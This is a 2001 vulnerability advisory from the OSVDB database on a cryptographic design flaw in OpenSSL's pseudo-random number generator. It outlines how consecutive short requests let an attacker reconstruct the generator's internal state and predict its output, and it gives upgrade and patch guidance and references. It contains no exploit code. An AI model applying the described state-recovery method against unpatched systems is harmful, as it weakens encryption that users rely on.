OpenSSL PRNG Information Disclosure

2001-07-10T00:00:00
ID OSVDB:853
Type osvdb
Reporter Markku-Juhani O. Saarinen(markku-juhani.saarinen@nokia.com)
Modified 2001-07-10T00:00:00

Description

Vulnerability Description

The pseudo-random number generator (PRNG) in OpenSSL contains a cryptographic design error, such that retrieving the output of a few hundred consecutive short PRNG requests enables attacker prediction of PRNG internal state. In turn, this allows the attacker to predict the subsequent PRNG output, significantly weakening the strength of the encryption. This problem originated in SSLeay and its derivative toolkits, of which OpenSSL is one.

Technical Description

OpenSSL's PRNG (located in crypto/md_rand.c in the source) uses a hash function to update its internal secret state and to generate output. The default hash selected is SHA-1. The PRNG's internal secret state contains two variables, a chaining variable called "md", sized according to the output of the selected hash function, and a large buffer called "state". The contents of "md" are replaced by a hash function output. "state" is accessed in a circular fashion, and is used for storing additional bits of entropy.

The vulnerable versions of OpenSSL set "md" to the hash of one half of its previous value and other data, including bytes from "state". Unfortunately, in vulnerable versions, the half of "md" input passed to the hash function is the same half that's used as PRNG output. Also, the number of bytes used from "state" can be as small as one if the requested amount of PRNG output is small. This makes brute-force analysis of all possible cases easy. The combination of these effects made it possible to reconstruct the complete internal PRNG state from the output of one PRNG request appropriately sized to your hash function (to gain knowledge of "md") followed by enough consecutive 1-byte PRNG requests to traverse all of "state".

Solution Description

Upgrade to version 0.9.6b or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch for versions of OpenSSL from 0.9.5 to 0.9.6a. Versions prior to 0.9.5 must upgrade.

Short Description

The pseudo-random number generator (PRNG) in OpenSSL contains a cryptographic design error, such that retrieving the output of a few hundred consecutive short PRNG requests enables attacker prediction of PRNG internal state. In turn, this allows the attacker to predict the subsequent PRNG output, significantly weakening the strength of the encryption. This problem originated in SSLeay and its derivative toolkits, of which OpenSSL is one.

References:

Vendor URL: http://www.openssl.org/ Vendor Specific Advisory URL Vendor Specific Advisory URL Vendor Specific Advisory URL Vendor Specific Advisory URL Vendor Specific Advisory URL Nessus Plugin ID:11060 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0162.html ISS X-Force ID: 6823 Generic Informational URL: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-013.txt.asc CVE-2001-1141 CERT VU: 131923 Bugtraq ID: 3004